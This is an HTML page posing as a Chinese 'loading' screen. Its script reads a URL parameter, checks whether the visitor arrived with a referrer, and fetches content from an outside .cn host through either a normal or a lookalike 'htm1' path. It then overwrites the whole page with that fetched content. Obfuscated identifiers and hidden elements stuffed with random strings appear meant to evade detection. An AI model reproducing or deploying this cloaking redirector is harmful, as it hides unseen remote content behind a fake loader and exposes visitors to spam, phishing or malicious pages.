<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .HXEJ2sZy9ku {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .HXEJ2sZy9ku .SvPy31Bs {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .HXEJ2sZy9ku .content {
            line-height: 50px;
            text-align: center
        }

        .HXEJ2sZy9ku .img {
            width: 100%
        }

        .HXEJ2sZy9ku .EjO5UaAK {
            text-align: center
        }

        .HXEJ2sZy9ku .EjO5UaAK span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .HXEJ2sZy9ku .EjO5UaAK span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .HXEJ2sZy9ku .EjO5UaAK span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .HXEJ2sZy9ku .EjO5UaAK span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .HXEJ2sZy9ku .EjO5UaAK span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .HXEJ2sZy9ku .EjO5UaAK span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .HXEJ2sZy9ku .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function DZu9bumtfx5C(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var hj0dXrD = DZu9bumtfx5C('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ hj0dXrD +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ hj0dXrD +".html?a=share";
		}
		
        OWxgL0=url+"#"+new Date().getTime();
        OWxgL0 && function() {
            $.get(OWxgL0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>IL8sbYX1LV45BOCIZN46B1gc2sqM7ltUl3ZQGZxKrKi1vTRhA6IDnkWfyaVKgGdm6u1nutoj8VWvQOvi66GZylT</p>
<a  href='#' style='display:none'>l2WMC2pifOScI6HjPO3o7kMy7pVO03VOgxIK1vSWNFnrQtU4FLltxm7uA2PSKKBXnZQkFrvCe2szl5</a>
<b style='display:none' >UJH9go9O1BVoezIfzCnRuQ6VhaZSfAb5fsA3hKJXHu7T7KEnzO9ZOvEIHJVJZl9DHeKGuDXkp43I1PuAa</b><div class="HXEJ2sZy9ku">
    <div class="SvPy31Bs">
        <div class="EjO5UaAK">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >Uz9dl32TbUqgxO9cm3Iuc1vc82</ul>
<span style='display:none'>wJdc8c1tlzinf1wybM5Sydpr2dFvqq91T4pRXShZM7UxpttIOCPYkdYzk7n8vNe</span>
<b style='display:none' >fwJc6cheWLwGGGdkV3WtdUh5kZyQeBkI0YJrpoTDh9N9RfZ5KOlqw4LpbsFP4ULcOyAtovY5TWgWHkHNl4RHCfhciaPweG1yAj26i</b>
<p  style='display:none'>aM64GI4pGXv7f7Utp6gZ9aYaJZyxNA4CVRzp9SpqzAyK1xuOWl</p>
<li style='display:none' >SLzHWvb1kkb1</li>
<span style='display:none'>wJdc8c1tlzinf1wybM5Sydpr2dFvqq91T4pRXShZM7UxpttIOCPYkdYzk7n8vNe</span></body>
</html>